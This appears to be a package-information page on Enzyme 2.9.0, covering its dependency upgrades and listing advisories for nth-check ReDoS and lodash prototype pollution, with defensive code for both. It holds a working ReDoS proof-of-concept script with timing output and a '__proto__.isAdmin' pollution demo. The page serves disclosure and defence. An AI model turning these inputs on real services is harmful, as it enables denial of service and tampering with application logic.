Enzyme 2.9.0 marks an incremental improvement over version 2.8.2, offering developers refined tools for testing React components. A key difference lies in the updated dependencies, reflecting a commitment to staying current with the broader JavaScript ecosystem. Specifically, newer versions of lodash (4.17.4 vs 4.17.2), prop-types (15.5.10 vs 15.5.4), object.entries (1.0.4 vs 1.0.3), object.values (1.0.4 vs 1.0.3) and uuid (v3 vs v2) are integrated, potentially bringing performance enhancements and bug fixes from those underlying libraries.
The core functionality of Enzyme remains consistent, ensuring a smooth upgrade for existing users. Developers familiar with Enzyme's shallow rendering, full DOM rendering, and static rendering capabilities will find the transition straightforward. The peer dependency on React remains the same, supporting React versions 0.13.x through 15.x, providing flexibility for projects with varying React versions.
Notable changes also appear in the devDependencies, with upgrades to babel-eslint, babel-preset-airbnb, chai, coveralls, eslint-config-airbnb, eslint-plugin-import, eslint-plugin-jsx-a11y, eslint-plugin-react, mocha, and sinon. These updates suggest improvements in the development workflow, potentially offering better linting rules, improved test performance, and enhanced debugging capabilities. While not impacting the runtime behavior of Enzyme itself, these updates contribute to a better developer experience when writing and maintaining tests for React components.
Upgrading to the latest versions of dependencies matters most to developers who care about security, performance and debuggability, so it is important to keep the npm packages a project has installed up to date.
All vulnerabilities related to version 2.9.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency, and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check");
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n" followed by a growing run of spaces and an invalid trailing character,
    // so parse() fails only after the regex has backtracked over the whitespace
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str);
    }
    catch (err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
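The sub-pattern above backtracks because the \s* before the optional group and the \s* inside it compete for the same run of whitespace, so every failed match is retried from many split points. The defensive alternative is a parser that visits each character once. The following is an added example, not nth-check's own code: a hand-written scanner for the same an+b syntax (plus the odd/even keywords) whose cost is bounded by the input length, so the long-whitespace string from the proof of concept is rejected in linear time. The function name parseNth and its [a, b] return shape are assumptions of this example.

```javascript
// Added example: backtracking-free parser for CSS :nth-child() arguments.
// Returns [a, b] for "an+b", e.g. "2n+1" -> [2, 1], "odd" -> [2, 1], "5" -> [0, 5].
// Throws SyntaxError on malformed input. Each character is inspected at most
// a constant number of times, so there is no super-linear blow-up.
function parseNth(input) {
  if (typeof input !== "string") throw new TypeError("expected a string");
  const s = input.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];

  let i = 0;
  const n = s.length;

  // Advance over whitespace; a single forward scan, never re-entered backwards.
  const skipWs = () => {
    while (i < n && (s[i] === " " || s[i] === "\t" || s[i] === "\n")) i++;
  };
  // Optional sign: returns +1 or -1 (default +1) and consumes it if present.
  const readSign = () => {
    if (s[i] === "+") { i++; return 1; }
    if (s[i] === "-") { i++; return -1; }
    return 1;
  };
  // Run of digits: returns the integer, or null when no digit is present.
  const readDigits = () => {
    const start = i;
    while (i < n && s[i] >= "0" && s[i] <= "9") i++;
    return i > start ? parseInt(s.slice(start, i), 10) : null;
  };

  const aSign = readSign();
  const aDigits = readDigits();

  if (i < n && s[i] === "n") {
    // Form: [sign][digits]n [ws] [sign [ws] digits]
    i++;
    const a = aSign * (aDigits === null ? 1 : aDigits);
    skipWs();
    if (i === n) return [a, 0];
    const c = s[i];
    if (c !== "+" && c !== "-") throw new SyntaxError("unexpected '" + c + "' at " + i);
    const bSign = readSign();
    skipWs();
    const bDigits = readDigits();
    if (bDigits === null) throw new SyntaxError("expected digits after sign");
    skipWs();
    if (i !== n) throw new SyntaxError("trailing input at " + i);
    return [a, bSign * bDigits];
  }

  // Form: [sign]digits, i.e. a = 0.
  if (aDigits === null) throw new SyntaxError("expected an+b expression");
  skipWs();
  if (i !== n) throw new SyntaxError("trailing input at " + i);
  return [0, aSign * aDigits];
}

// Returns true when the input is rejected; a constructed probe shaped like the
// proof-of-concept string ("2n", many spaces, "!") exercises the whitespace path.
function rejects(input) {
  try { parseNth(input); return false; } catch (e) { return e instanceof SyntaxError; }
}

module.exports = { parseNth, rejects };
```

The point of the scanner is structural: the whitespace after "n" is consumed exactly once by skipWs, and the decision of what may follow it is made by looking at a single character, so there is nothing for the parser to backtrack over when the input turns out to be invalid.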
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
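To make the failure mode concrete without depending on lodash itself, the following is an added example, not lodash's code: a minimal deep set-by-path in the style of set(), written first naively and then hardened to refuse the path segments (__proto__, constructor, prototype) through which a user-controlled path can reach Object.prototype, together with a small check that tells you whether the shared prototype has already been polluted. The function names deepSetNaive, deepSetSafe, isObjectPrototypePolluted and demo, and the constructed user path "__proto__.isAdmin", are assumptions of this example.

```javascript
// Added example (not lodash's code): deep "set by path" in the style of set().

// Naive version: walks every segment of a user-supplied dotted path and creates
// intermediate objects as needed. Because ({}).__proto__ is Object.prototype,
// a path starting with "__proto__" writes onto the prototype shared by all objects.
function deepSetNaive(target, path, value) {
  const keys = path.split(".");
  let cur = target;
  for (let k = 0; k < keys.length - 1; k++) {
    const key = keys[k];
    if (cur[key] === null || typeof cur[key] !== "object") cur[key] = {};
    cur = cur[key];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Segments that can escape the target object and reach a prototype.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Hardened version: rejects forbidden segments up front and only descends into
// own properties, so a user-controlled path can never leave `target`.
function deepSetSafe(target, path, value) {
  const keys = path.split(".");
  for (const key of keys) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error("refusing to set prototype key: " + key);
  }
  let cur = target;
  for (let k = 0; k < keys.length - 1; k++) {
    const key = keys[k];
    const own = Object.prototype.hasOwnProperty.call(cur, key);
    if (!own || cur[key] === null || typeof cur[key] !== "object") cur[key] = {};
    cur = cur[key];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Detection helper: has Object.prototype gained an own property it should not have?
function isObjectPrototypePolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Walks through both versions with a constructed attacker-style path, as it might
// arrive in a JSON request body (assumption), and cleans up after itself.
function demo() {
  const userPath = "__proto__.isAdmin"; // constructed input for this example
  const before = isObjectPrototypePolluted("isAdmin");

  deepSetNaive({}, userPath, true);
  // Any unrelated fresh object now reports isAdmin === true.
  const afterNaive = isObjectPrototypePolluted("isAdmin") && ({}).isAdmin === true;
  delete Object.prototype.isAdmin; // undo the pollution so later code is unaffected

  let safeRejected = false;
  try { deepSetSafe({}, userPath, true); } catch (e) { safeRejected = true; }
  const afterSafe = isObjectPrototypePolluted("isAdmin");

  return { before, afterNaive, safeRejected, afterSafe };
}

module.exports = { deepSetNaive, deepSetSafe, isObjectPrototypePolluted, demo };
```

Two design choices carry the protection: the deny-list stops the three segments that name a prototype, and the hasOwnProperty check means the walk only ever follows properties the target object itself owns, which also covers inherited accessors that a deny-list alone would miss. The detection helper is the check to run in a test suite or at startup when a dependency at an affected version is still in the tree.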